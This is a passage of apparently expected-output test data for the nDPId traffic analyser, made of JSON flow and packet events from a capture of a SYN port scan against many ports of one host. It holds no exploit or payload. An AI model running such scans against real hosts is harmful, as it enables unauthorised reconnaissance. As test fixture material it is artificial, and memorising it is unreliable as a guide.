+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs7g4AADoGIGSsEAAIQA2GNIzSBR\/dUoMYAAAAAGACDAAncAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs1RQAACkGSl6sEAAIQA2GNIzSJr3dUoMYAAAAAGACCAAJ0gAAAgQFtA=="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1278275058093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275058093,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACHppjNJGY57x3VKDGVAUAADweQAAAAAAAAAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsYKcAACgGv8usEAAIQA2GNIzT\/ejdU4MZAAAAAGACBAA2owAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsfsIAADMGlrCsEAAIQA2GNIzTBjrdU4MZAAAAAGACEAAiUgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsa1MAAC8Grh+sEAAIQA2GNIzTPtDdU4MZAAAAAGACEADpuwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhYAADsG81ysEAAIQA2GNIzTgArdU4MZAAAAAGACEACogQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMvMAAC4G53+sEAAIQA2GNIzTEvDdU4MZAAAAAGACDAAZnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAspfkAADsGZ3msEAAIQA2GNIzTHmHdU4MZAAAAAGACEAAKKwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKRwAACUG+lasEAAIQA2GNIzTRdXdU4MZAAAAAGACCADqtgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAs13MAADUGO\/+sEAAIQA2GNIzTDyjdU4MZAAAAAGACCAAhZAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7gAADgG2LqsEAAIQA2GNIzTAgLdU4MZAAAAAGACBAAyigAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKvUAACsG8n2sEAAIQA2GNIzTN57dU4MZAAAAAGACEADw7QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAslWEAADoGeRGsEAAIQA2GNIzTB\/bdU4MZAAAAAGACDAAklgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsazkAADsGojmsEAAIQA2GNIzSIGPdUoMYAAAAAGACEAAILAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsLfQAADkG4X6sEAAIQA2GNIzSDvLdUoMYAAAAAGACCAAhnQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFwAAC8GcRasEAAIQA2GNIzSDAXdUoMYAAAAAGACEAAcigAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsOg0AACsG42WsEAAIQA2GNIzSBKPdUoMYAAAAAGACEAAj7AAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsF+kAACgGCIqsEAAIQA2GNIzSHCDdUoMYAAAAAGACBAAYbwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsKVIAADUG6iCsEAAIQA2GNIzSFr7dUoMYAAAAAGACCAAZ0QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NYAACcGMJysEAAIQA2GNIzSBADdUoMYAAAAAGACEAAkjwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsP0EAACcG4jGsEAAIQA2GNIzSKYLdUoMYAAAAAGACEAD\/DAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsRFwAADMG0RasEAAIQA2GNIzSACDdUoMYAAAAAGACEAAobwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWBgAADIGvlqsEAAIQA2GNIzSOpzdUoMYAAAAAGACDADx8gAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAscJoAADMGpNisEAAIQA2GNIzSznDdUoMYAAAAAGACEABaHgAAAgQFtA=="} 